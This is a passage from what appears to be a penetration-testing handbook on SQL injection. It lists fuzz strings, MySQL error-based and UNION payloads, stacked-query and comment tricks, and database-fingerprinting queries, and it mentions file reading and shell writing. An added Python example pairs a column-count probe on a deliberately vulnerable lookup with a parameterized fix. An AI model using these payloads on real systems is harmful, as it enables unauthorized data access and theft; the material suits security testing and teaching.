4.1.2. Injection Detection

4.1.2.1. Common injection points

  • GET/POST/PUT/DELETE parameters

  • X-Forwarded-For

  • file name

4.1.2.2. Fuzz injection point

  • ' / "

  • 1/1

  • 1/0

  • and 1=1

  • " and "1"="1

  • and 1=2

  • or 1=1

  • or 1=

  • ' and '1'='1

  • + - ^ * % /

  • << >> || | & &&

  • ~

  • !

  • @

  • backticks execute

4.1.2.3. Test constants

  • @@version

  • @@servername

  • @@language

  • @@spid

4.1.2.4. Number of test columns

For example: http://www.foo.com/index.asp?id=12+union+select+null,null-- ; keep adding null columns until the query no longer returns an error. The first count that does not error is the number of columns in the original query.
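The following is an added example (not part of the original notes) that replays the column-counting probe above against a deliberately vulnerable lookup and, beside it, the parameterized form that stops it. It uses an in-memory SQLite database with a constructed items table instead of the MySQL/ASP setup the text assumes, so the error text differs but the behaviour is the same: the concatenated query accepts the union, the bound query treats the whole payload as a value and matches nothing.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not a real application).
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO items VALUES (12, 'widget', 9.5);
INSERT INTO items VALUES (13, 'gadget', 19.0);
"""


def open_db():
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, item_id):
    """String concatenation: the 'id' parameter becomes part of the SQL text,
    so 'null' columns appended through UNION are parsed as SQL."""
    sql = "SELECT id, name FROM items WHERE id=" + str(item_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn, item_id):
    """Parameterized query: the value is bound by the driver and never parsed
    as SQL, so the same payload is just a string that matches no row."""
    return conn.execute("SELECT id, name FROM items WHERE id=?", (item_id,)).fetchall()


def probe_column_count(conn, max_cols=6):
    """Replay the probe from the text against the vulnerable lookup: add one
    null per attempt and return the first count that does not raise an error.
    SQLite reports a column-count mismatch as OperationalError; MySQL reports
    'The used SELECT statements have a different number of columns'."""
    for n in range(1, max_cols + 1):
        payload = "12 union select " + ",".join(["null"] * n) + "--"
        try:
            lookup_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    db = open_db()
    print("columns in original query:", probe_column_count(db))
    print("vulnerable:", lookup_vulnerable(db, "12 union select null,null--"))
    print("parameterized:", lookup_safe(db, "12 union select null,null--"))
```

The detection-side lesson is the error itself: a burst of column-count errors from one client against one parameter, followed by a request that succeeds, is exactly the pattern this probe leaves in application logs.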

4.1.2.5. Error injection

  • select 1/0

  • select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a

  • extractvalue(1, concat(0x5c,(select user())))

  • updatexml(0x3a,concat(1,(select user())),1)

  • exp(~(SELECT * from(select user())a))

  • ST_LatFromGeoHash((select * from(select * from(select user())a)b))

  • GTID_SUBSET(version(), 1)

4.1.2.5.1. Geometric-based error injection

  • GeometryCollection((select * from (select * from(select user())a)b))

  • polygon((select * from(select * from(select user())a)b))

  • multipoint((select * from(select * from(select user())a)b))

  • multilinestring((select * from(select * from(select user())a)b))

  • LINESTRING((select * from(select * from(select user())a)b))

  • multipolygon((select * from(select * from(select user())a)b))

Note that error injection based on the exp function no longer works in MySQL versions after 5.5.49; for details, see commit 95825f.

The geometric-based error injection in the list above was fixed in commit 5caea4 and no longer works in later 5.5.x versions.

4.1.2.6. Stacked Injection

  • ;select 1

4.1.2.7. Comments

  • #

  • --+

  • /*xxx*/

  • /*!xxx*/

  • /*!50000xxx*/

4.1.2.8. Judging filter rules

  • Whether input is truncated

  • Whether a character is filtered

  • Whether keywords are filtered

  • Slashes and encoding

4.1.2.9. Obtaining information

  • Determine database type
    • and exists (select * from msysobjects) > 0 (Access database)

    • and exists (select * from sysobjects) > 0 (SQL Server database)

  • Determine whether a table exists
    • and exists (select * from admin)

  • Version, hostname, username, database name

  • Tables and Fields
    • Determine the number of fields
      • Order By

      • Select Into

    • table name, column name

4.1.2.10. Test permissions

  • file operations
    • read sensitive files

    • write shell

  • out-of-band channel
    • network request